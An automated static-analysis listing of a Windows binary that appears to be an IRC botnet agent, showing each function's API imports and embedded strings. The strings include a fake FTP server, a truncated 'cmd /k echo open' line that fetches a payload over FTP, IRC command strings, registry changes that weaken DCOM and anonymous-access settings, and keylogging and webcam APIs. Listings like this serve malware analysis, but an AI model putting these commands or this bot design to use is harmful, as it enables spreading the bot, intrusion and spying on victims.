sub_outside():
	KERNEL32.GetTickCount
	KERNEL32.Sleep
	KERNEL32.CreateThread
	NTDLL.RtlGetLastWin32Error
	KERNEL32.CloseHandle
	KERNEL32.ReadFile
	KERNEL32.CreatePipe
	KERNEL32.GetCurrentProcess
	KERNEL32.CreateFileA
	KERNEL32.ExitProcess
	KERNEL32.GetFileAttributesA
	KERNEL32.CopyFileA
	KERNEL32.GetLocaleInfoA
	KERNEL32.GetVersionExA
	KERNEL32.GetVersion
	KERNEL32.LCMapStringW
	KERNEL32.MultiByteToWideChar
	KERNEL32.WideCharToMultiByte
	KERNEL32.UnhandledExceptionFilter
	KERNEL32.GetEnvironmentStringsW
	KERNEL32.GetEnvironmentStringsA
	KERNEL32.FreeEnvironmentStringsW
	KERNEL32.GetStringTypeW
sub_412683(0102):
	NTDLL.RtlGetLastWin32Error
sub_4188D7(0126):
	KERNEL32.SetUnhandledExceptionFilter
sub_408416(019e):
	"%sKB"
	"failed"
sub_4068BD(0458):
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle

	"explorer.exe"
sub_407520(04c3):
	KERNEL32.GetTickCount

	"%dd %dh %dm"
sub_40F7CF(04fb):
	KERNEL32.CreateThread
	KERNEL32.Sleep
	KERNEL32.CloseHandle
sub_41A193(06b3):
	NTDLL.RtlGetLastWin32Error
sub_40295F(09ff):
	WS2_32.WSAStartup
	WS2_32.socket
	WS2_32.setsockopt
	WS2_32.ioctlsocket
	WS2_32.ntohs
	WS2_32.bind
	WS2_32.listen
	WS2_32.select
	WS2_32.__WSAFDIsSet
	WS2_32.accept
	WS2_32.send
	WS2_32.recv
	WS2_32.closesocket

	"220 fuckFtpd 0wns j0\n"
	"%s %s"
	"USER"
	"331 Password required\n"
	"PASS"
	"230 User logged in.\n"
	"SYST"
	"215 fuckFtpd\n"
	"REST"
	"350 Restarting.\n"
	"257 \"/\" is current directory.\n"
	"TYPE"
	"A"
	"200 Type set to A.\n"
	"TYPE"
	"I"
	"200 Type set to I.\n"
	"PASV"
	"425 Passive not supported on this serve"...
	"LIST"
	"226 Transfer complete\n"
	"PORT"
	"%*s %[^,],%[^,],%[^,],%[^,],%[^,],%[^\n]"...
	"%x%x\n"
	"%s.%s.%s.%s"
	"200 PORT command successful.\n"
	"RETR"
	"150 Opening BINARY mode data connection"...
	"226 Transfer complete.\n"
	"425 Can't open data connection.\n"
	"QUIT"
	"221 Goodbye happy r00ting.\n"
sub_417D10(0b41):
	NTDLL.RtlGetLastWin32Error
sub_40E2F4(0b6c):
	NTDLL.RtlGetLastWin32Error

	"The following	Windows	services are regi"...
	"	 Unknown"
	"	 Paused"
	"    Pausing"
	" Continuing"
	"	 Running"
	"    Stoping"
	"   Starting"
	"    Stopped"
	"%s: %s (%s)"
sub_406776(0dc3):
	NTDLL.RtlGetLastWin32Error

	"%s	Error: %s <%d>."
sub_419541(0e35):
	KERNEL32.LoadLibraryA

	"user32.dll"
	"MessageBoxA"
	"GetActiveWindow"
	"GetLastActivePopup"
sub_40F038(1dc8):
	KERNEL32.CloseHandle

	"SeDebugPrivilege"
	" %s (%d)"
	"SeDebugPrivilege"
sub_40235F(1dd9):
	WS2_32.socket
	KERNEL32.Sleep

	"cmd /k echo open %s %d > o&echo user 1 "...
sub_40DFB2(20fc):
	KERNEL32.Sleep

	"NOTICE"
	"PRIVMSG"
	"%s"
sub_404BA8(22a3):
	"%d.%d.%d.%d"
sub_4078F3(23e7):
	"[NETINFO]: [Type]: %s	(%s). [IP Address"...
sub_407D6B(3339):
	"rb"
sub_403F88(3676):
	KERNEL32.CreateFileA
	KERNEL32.SetFilePointer
	KERNEL32.ReadFile
	KERNEL32.CloseHandle
sub_4034D4(3afa):
	"text/html"
	"application/octet-stream"
	"ddd, dd	MMM yyyy"
	"HH:mm:ss"
	"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
	"HTTP/1.0 200 OK\r\nServer: myBot\r\nCache-C"...
sub_40E626(3fe3):
	"Share	name:	 Resource:		 "...
	"Yes"
	"No"
	"%-14S %-24S %-6u %-4s"
sub_4148D2(45d6):
	"KERNEL32"
	"IsProcessorFeaturePresent"
sub_404EF5(4acc):
	NTDLL.RtlDeleteCriticalSection
	KERNEL32.InitializeCriticalSectionAndSpinCount
	KERNEL32.CreateThread
	KERNEL32.Sleep
	NTDLL.RtlGetLastWin32Error
sub_4149F9(502f):
	"e+000"
sub_411878(54b6):
	KERNEL32.GetLocalTime
sub_413466(55e5):
	KERNEL32.HeapCreate
	KERNEL32.HeapDestroy
sub_41350B(597c):
	KERNEL32.VirtualFree
	NTDLL.RtlFreeHeap
sub_410B5F(5c3f):
	NTDLL.RtlFreeHeap
sub_4022A4(5f99):
	"GET /	HTTP/1.0\r\nHost: %s\r\nAuthorization"...
sub_416932(6091):
	KERNEL32.SetFilePointer
	NTDLL.RtlGetLastWin32Error
sub_4195CA(60b5):
	NTDLL.RtlAllocateHeap
sub_419D11(6338):
	"1#SNAN"
	"1#IND"
	"1#INF"
	"1#QNAN"
sub_40E176(6353):
	"The specified	service	name is	invalid."
	"The requested	control	code is	undefined"...
	"The handle is	invalid."
	"The handle does not have the required	a"...
	"The service binary file could	not be fo"...
	"The service cannot be	stopped	because	o"...
	"The database is locked."
	"A thread could not be	created	for the	s"...
	"The process for the service was started"...
	"The requested	control	code is	not valid"...
	"An instance of the service is	already	r"...
	"The system is	shutting down."
	"An unknown error occurred: <%ld>"
sub_413BF0(64eb):
	KERNEL32.VirtualAlloc
sub_417FE0(66df):
	KERNEL32.WideCharToMultiByte
sub_415628(6954):
	NTDLL.RtlSizeHeap
sub_401EC6(6e81):
	WS2_32.select
	WS2_32.__WSAFDIsSet
sub_40F5F6(71f8):
	KERNEL32.GetTickCount

	"mIRC"
sub_40F38C(7e76):
	KERNEL32.GetTickCount
sub_40FC44(7f0a):
	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
	"%c$"
	"%c:\\"
sub_41AE5C(822d):
	"invalid string position"
sub_41AC30(822d):
	"string too long"
sub_416290(84ec):
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error
sub_4101E9(8732):
	"%s: %s stopped. (%d thread(s)	stopped.)"...
	"%s: No %s thread found."
sub_40E88D(893c):
	"Account: %S"
	"Full Name:	%S"
	"User Comment: %S"
	"Comment: %S"
	"Unknown"
	"Administrator"
	"User"
	"Guest"
	"Privilege Level: %s"
	"Auth Flags: %d"
	"Home Directory: %S"
	"Parameters: %S"
	"Password Age: %d"
	"Bad Password Count: %d"
	"Number of Logins: %d"
	"Last Logon: %d"
	"Last Logoff: %d"
	"Logon Server: %S"
	"Country	Code: %d"
	"User's Language: %d"
	"Max. Storage: %d"
sub_41108C(8af0):
	NTDLL.RtlUnwind
sub_40E4F0(8cdb):
	KERNEL32.WideCharToMultiByte
sub_406800(8e50):
	KERNEL32.GlobalLock
	KERNEL32.GlobalUnlock
sub_40763F(8f4e):
	KERNEL32.GetVersionExA

	"95"
	"NT"
	"98"
	"ME"
	"2K"
	"XP"
	"2003"
	"couldn't resolve host"
sub_41242F(91cb):
	KERNEL32.GetFileAttributesA
	NTDLL.RtlGetLastWin32Error
sub_412879(95ea):
	KERNEL32.MultiByteToWideChar
	NTDLL.RtlGetLastWin32Error
sub_402F62(9713):
	WS2_32.WSAStartup
	WS2_32.socket
	WS2_32.inet_addr
	WS2_32.ntohs
	WS2_32.connect
	WS2_32.closesocket
	WS2_32.WSACleanup
sub_41894B(9a80):
	KERNEL32.MultiByteToWideChar
sub_40EDDB(9bb4):
	"Invalid parameter."
	"Server name not found."
	"This network request is not supported."
	"Not enough memory."
	"The name is invalid."
	"Duplicate share name."
	"Invalid for redirected resource."
	"Device or directory does not exist."
	"Level	parameter is invalid."
	"A general failure occurred in	the netwo"...
	"The operation	is allowed only	on the pr"...
	"The user account already exists."
	"The group already exists."
	"The password is shorter than required	("...
	"An unknown error occurred."
	"The computer name is invalid."
	"Share	not found."
	"The user name	could not be found."
	"Network connection not found."
sub_406961(9dbe):
	"SeShutdownPrivilege"
sub_406B0B(9f54):
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle

	"@echo off\r\nEcho REGEDIT4>%temp%\\1.reg\r\n"...
	"c:\\ab3.bat"
sub_402064(a2f7):
	WS2_32.send
sub_41A698(a659):
	KERNEL32.CompareStringW
	KERNEL32.CompareStringA
	KERNEL32.MultiByteToWideChar
sub_40468B(a6b1):
	" %s:	%d,"
	" Total: %d in %s."
sub_40EC5B(a909):
	"Username accounts for	local system:"
	"  %S"
	"Total	users found: %d."
sub_40E0D4(a9bc):
	NTDLL.RtlGetLastWin32Error
sub_40F32E(ac14):
	KERNEL32.GetTickCount

	"%s"
sub_4061ED(ac3c):
	"Kernel32.dll failed. <%d>"
	"User32.dll failed. <%d>"
	"Advapi32.dll failed. <%d>"
	"Gdi32.dll failed. <%d>"
	"Ws2_32.dll failed. <%d>"
	"Wininet.dll failed. <%d>"
	"Icmp.dll failed. <%d>"
	"Netapi32.dll failed. <%d>"
	"Dnsapi.dll failed. <%d>"
	"Iphlpapi.dll failed. <%d>"
	"Mpr32.dll failed. <%d>"
	"Shell32.dll failed. <%d>"
	"Odbc32.dll failed. <%d>"
	"Avicap32.dll failed. <%d>"
sub_41B08B(aeff):
	KERNEL32.RaiseException
sub_412A93(af5c):
	KERNEL32.ExitProcess
sub_40E5C2(afa1):
	KERNEL32.MultiByteToWideChar
sub_408385(b2db):
	"RAM"
	"Cdrom"
	"Network"
	"Disk"
	"Invalid"
	"Unknown"
sub_408C63(bc9b):
	KERNEL32.Sleep
sub_40683B(c209):
	KERNEL32.CloseHandle

	"mIRC"
sub_408DCB(c24e):
	KERNEL32.Sleep

	"PASS	%s\r\n"
sub_402FDF(c55e):
	WS2_32.send
	KERNEL32.Sleep
	WS2_32.closesocket
	WS2_32.WSACleanup

	"rb"
sub_416554(c6bf):
	KERNEL32.ReadFile
	NTDLL.RtlGetLastWin32Error
sub_404CE1(c893):
	KERNEL32.GetTickCount
	NTDLL.RtlEnterCriticalSection
	NTDLL.RtlLeaveCriticalSection
	KERNEL32.Sleep

	"asn1http"
sub_410DE8(cba9):
	NTDLL.RtlUnwind
sub_413B3F(cbe8):
	NTDLL.RtlReAllocateHeap
	NTDLL.RtlAllocateHeap
	KERNEL32.VirtualAlloc
	NTDLL.RtlFreeHeap
sub_4140CC(d2f6):
	KERNEL32.RaiseException
sub_417BBD(d499):
	""
	"..."
	"Runtime Error!\n\nProgram: "
	"\n\n"
	"Microsoft Visual C++ Runtime Library"
sub_41230F(d50c):
	NTDLL.RtlAllocateHeap
	NTDLL.RtlReAllocateHeap
sub_4188C6(d8fa):
	KERNEL32.SetUnhandledExceptionFilter
sub_408603(dc5b):
	"A:\\"
sub_40F920(dcb6):
	"Software\\Microsoft\\OLE"
	"EnableDCOM"
	"SYSTEM\\CurrentControlSet\\Control\\Lsa"
	"restrictanonymous"
sub_406CDF(e076):
	"%d.%d.%d.%d"
sub_404073(e1a1):
	"%s %s	HTTP/1.1\nReferer: %s\nHost: %s\nCon"...
sub_405154(e3c1):
	KERNEL32.CreateThread
	KERNEL32.Sleep
	NTDLL.RtlGetLastWin32Error
sub_4134A2(e71f):
	NTDLL.RtlAllocateHeap
sub_405560(eb03):
	KERNEL32.GetModuleHandleA
	NTDLL.RtlGetLastWin32Error
	KERNEL32.LoadLibraryA

	"kernel32.dll"
	"SetErrorMode"
	"CreateToolhelp32Snapshot"
	"Process32First"
	"GetDiskFreeSpaceExA"
	"GetLogicalDriveStringsA"
	"SearchPathA"
	"QueryPerformanceCounter"
	"QueryPerformanceFrequency"
	"RegisterServiceProcess"
	"user32.dll"
	"SendMessageA"
	"FindWindowA"
	"IsWindow"
	"GetClipboardData"
	"CloseClipboard"
	"GetAsyncKeyState"
	"GetKeyState"
	"GetWindowTextA"
	"GetForegroundWindow"
	"advapi32.dll"
	"RegCreateKeyExA"
	"RegSetValueExA"
	"RegQueryValueExA"
	"RegDeleteValueA"
	"RegCloseKey"
	"OpenProcessToken"
	"LookupPrivilegeValueA"
	"AdjustTokenPrivileges"
	"OpenSCManagerA"
	"OpenServiceA"
	"ControlService"
	"CloseServiceHandle"
	"EnumServicesStatusA"
	"IsValidSecurityDescriptor"
	"GetUserNameA"
	"gdi32.dll"
	"CreateDCA"
	"CreateDIBSection"
	"CreateCompatibleDC"
	"GetDIBColorTable"
	"SelectObject"
	"BitBlt"
	"DeleteDC"
	"DeleteObject"
	"ws2_32.dll"
	"WSAStartup"
	"WSASocketA"
	"WSAAsyncSelect"
	"__WSAFDIsSet"
	"WSAIoctl"
	"WSAGetLastError"
	"WSACleanup"
	"socket"
	"ioctlsocket"
	"connect"
	"inet_ntoa"
	"inet_addr"
	"htons"
	"htonl"
	"ntohs"
	"ntohl"
	"send"
	"sendto"
	"recv"
	"recvfrom"
	"bind"
	"select"
	"listen"
	"accept"
	"setsockopt"
	"getsockname"
	"gethostname"
	"getpeername"
	"closesocket"
	"wininet.dll"
	"InternetGetConnectedState"
	"InternetGetConnectedStateEx"
	"HttpOpenRequestA"
	"HttpSendRequestA"
	"InternetConnectA"
	"InternetOpenUrlA"
	"InternetCrackUrlA"
	"InternetReadFile"
	"InternetCloseHandle"
	"Mozilla/4.0 (compatible)"
	"icmp.dll"
	"IcmpCreateFile"
	"IcmpCloseHandle"
	"IcmpSendEcho"
	"netapi32.dll"
	"NetShareAdd"
	"NetShareDel"
	"NetShareEnum"
	"NetScheduleJobAdd"
	"NetApiBufferFree"
	"NetRemoteTOD"
	"NetUserAdd"
	"NetUserDel"
	"NetUserEnum"
	"NetUserGetInfo"
	"NetMessageBufferSend"
	"dnsapi.dll"
	"DnsFlushResolverCache"
	"DnsFlushResolverCacheEntry_A"
	"iphlpapi.dll"
	"DeleteIpNetEntry"
	"mpr.dll"
	"WNetAddConnection2A"
	"WNetAddConnection2W"
	"WNetCancelConnection2A"
	"WNetCancelConnection2W"
	"shell32.dll"
	"SHChangeNotify"
	"odbc32.dll"
	"SQLDriverConnect"
	"SQLAllocHandle"
	"avicap32.dll"
	"capCreateCaptureWindowA"
	"capGetDriverDescriptionA"
sub_412579(ece9):
	KERNEL32.ExitProcess
sub_407AB1(edda):
	KERNEL32.GetLocalTime

	"[%.2d-%.2d-%4d %.2d:%.2d:%.2d] %s"
sub_403079(f019):
	"GET	"
	" "
	"\r\n"
sub_403906(f033):
	KERNEL32.FindFirstFileA
	KERNEL32.FindNextFileA
	KERNEL32.Sleep

	"\n"
	"PRIVMSG %s :Searching	for: %s\r\n"
	"\r\n\r\nIndex of %s</TIT"...
	"<H1>Index of %s</H1>\r\n<TABLE BORDER=\"0\""...
	"<TR>\r\n<TD WIDTH=\"%d\"><CODE>Name</CODE><"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"<TR>\r\n<TD COLSPAN=\"3\"><A HREF=\"%s\"><COD"...
	".."
	"."
	"PM"
	"AM"
	"%2.2d/%2.2d/%4d  %2.2d:%2.2d %s"
	"<%s>"
	"PRIVMSG %s :%-31s  %-21s\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"%s%s/"
	"\"><CODE>%.29s>/</CODE></A>"
	"\"><CODE>%s/</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"<%s>"
	"%-31s  %-21s\r\n"
	"PRIVMSG %s :%-31s  %-21s (%s bytes)\n"
	"<TR>\r\n<TD WIDTH=\"%d\"><A HREF=\""
	"%s%s"
	"\"><CODE>%.30s></CODE></A>"
	"\"><CODE>%s</CODE></A>"
	"</TD>\r\n<TD WIDTH=\"%d\"><CODE>%s</CODE></"...
	"%-31s  %-21s (%i bytes)\r\n"
	"PRIVMSG %s :Found %s Files and %s Direc"...
	"<TR>\r\n<TD COLSPAN=\"3\"><HR></TD>\r\n</TR>\r"...
	"Found: %i Files and %i Directories\r\n"
</font></pre></td></tr><tr id="sub_401B60"><td><pre><a name="sub_401B60"></a><a href="1e4ad6cdb169ea59ca5996fc57982460_unpacked.asm.html#sub_401B60"><font size=+2>sub_401B60</a>(f1cc)</font>:<font color=brown>
	"BBBB"
	"CCCC"
</font></pre></td></tr><tr id="sub_419246"><td><pre><a name="sub_419246"></a><a href="1e4ad6cdb169ea59ca5996fc57982460_unpacked.asm.html#sub_419246"><font size=+2>sub_419246</a>(f395)</font>:<font color=darkgreen>
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown></font></pre></td></tr><tr id="sub_408531"><td><pre><a name="sub_408531"></a><a href="1e4ad6cdb169ea59ca5996fc57982460_unpacked.asm.html#sub_408531"><font size=+2>sub_408531</a>(f5ac)</font>:<font color=brown>
	"failed"
</font></pre></td></tr><tr id="sub_40718F"><td><pre><a name="sub_40718F"></a><a href="1e4ad6cdb169ea59ca5996fc57982460_unpacked.asm.html#sub_40718F"><font size=+2>sub_40718F</a>(f806)</font>:<font color=darkgreen>
	KERNEL32.Sleep</font>
<font color=brown>
	"PRIVMSG %s	:%s\r"
	"%s"
</font></pre></td></tr><tr id="sub_403656"><td><pre><a name="sub_403656"></a><a href="1e4ad6cdb169ea59ca5996fc57982460_unpacked.asm.html#sub_403656"><font size=+2>sub_403656</a>(f8ad)</font>:<font color=darkgreen>
	KERNEL32.GetFileAttributesA
	KERNEL32.CreateFileA
	KERNEL32.CloseHandle
	KERNEL32.CreateThread
	KERNEL32.Sleep
	NTDLL.RtlGetLastWin32Error</font>
<font color=brown>
	"\\%s"
	"%s"
	"%s%s"
	"\n"
	"*"
</font></pre></td></tr><tr id="sub_40F2C7"><td><pre><a name="sub_40F2C7"></a><a href="1e4ad6cdb169ea59ca5996fc57982460_unpacked.asm.html#sub_40F2C7"><font size=+2>sub_40F2C7</a>(fb77)</font>:<font color=darkgreen>
	KERNEL32.CloseHandle</font>
<font color=brown></font></pre></td></tr><tr id="sub_410B29"><td><pre><a name="sub_410B29"></a><a href="1e4ad6cdb169ea59ca5996fc57982460_unpacked.asm.html#sub_410B29"><font size=+2>sub_410B29</a>(fd6e)</font>:<font color=darkgreen>
	NTDLL.RtlAllocateHeap</font>
<font color=brown></font></pre></td></tr><tr id="sub_41A5B4"><td><pre><a name="sub_41A5B4"></a><a href="1e4ad6cdb169ea59ca5996fc57982460_unpacked.asm.html#sub_41A5B4"><font size=+2>sub_41A5B4</a>(fe6c)</font>:<font color=darkgreen>
	KERNEL32.WideCharToMultiByte</font>
<font color=brown></font></pre></td></tr></table><script>
document.getElementById(window.location.href.split('#')[1]).setAttribute("style", "background-color:#ddddff");
</script>
</html>